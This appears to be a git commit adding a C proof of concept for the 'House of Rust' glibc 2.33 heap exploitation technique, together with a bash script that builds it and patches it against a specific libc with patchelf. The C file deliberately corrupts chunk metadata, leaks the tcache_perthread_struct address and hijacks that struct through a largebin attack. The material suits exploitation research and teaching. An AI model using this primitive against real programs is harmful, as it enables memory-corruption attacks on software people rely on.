update

house_of_poc/house_of_rust/house_of_rust.c

+#include<stdio.h>
+#include<stdlib.h>
+#include<unistd.h>
+
+#define TCACHE_NUM 7
+#define SMALL_NUM 7
+
+int main() {
+    void *tcache_chunk[TCACHE_NUM];
+    size_t *small_chunk[SMALL_NUM];
+
+    for (int i = 0; i < TCACHE_NUM; i++) {
+        tcache_chunk[i] = malloc(0x88);
+    }
+    for (int i = 0; i < SMALL_NUM; i++) {
+        small_chunk[i] = malloc(0x88);
+        malloc(0x10);
+    }
+
+    for (int i = 0; i < TCACHE_NUM; i++) {
+        free(tcache_chunk[i]);
+    }
+    for (int i = 0; i < SMALL_NUM; i++) {
+        free(small_chunk[i]);
+    }
+    free(malloc(0x500));
+    small_chunk[SMALL_NUM - 1][-1] = 0xb1;
+    free(small_chunk[SMALL_NUM - 1]);
+
+    size_t tcache_perthread_struct = small_chunk[SMALL_NUM - 1][1];
+    printf("[*] tcache_perthread_struct: %p\n", tcache_perthread_struct);
+
+    size_t *large_chunk = malloc(0x420);
+    malloc(0x500);
+    void *unsorted_chunk = malloc(0x410);
+    malloc(0x500);
+    free(large_chunk);
+    free(malloc(0x500));
+    large_chunk[3] = tcache_perthread_struct - 8;
+    free(unsorted_chunk);
+    malloc(0x500);
+
+    for (int i = 0; i < TCACHE_NUM; i++) {
+        tcache_chunk[i] = malloc(0x88);
+    }
+    malloc(0x88);
+
+    printf("[+] hijack tcache_perthread_struct: %p\n", malloc(0x88));
+
+    _exit(0);
+}
\ No newline at end of file

house_of_poc/house_of_rust/patch.sh

+#!/bin/bash
+
+FILE_NAME=house_of_rust
+GLIBC_VERSION=2.33
+ARCH=amd64
+
+gcc ${FILE_NAME}.c -o $FILE_NAME -g
+
+sudo cp /glibc/${GLIBC_VERSION}/${ARCH}/lib/libc-${GLIBC_VERSION}.so .
+sudo cp /glibc/${GLIBC_VERSION}/${ARCH}/lib/ld-${GLIBC_VERSION}.so .
+
+sudo chmod 777 ./${FILE_NAME}
+sudo chmod 777 ./libc-${GLIBC_VERSION}.so
+sudo chmod 777 ./ld-${GLIBC_VERSION}.so
+
+patchelf --replace-needed libc.so.6 ./libc-${GLIBC_VERSION}.so ./${FILE_NAME}
+patchelf --set-interpreter ./ld-${GLIBC_VERSION}.so ./${FILE_NAME}
+
+#gdb ${FILE_NAME}
\ No newline at end of file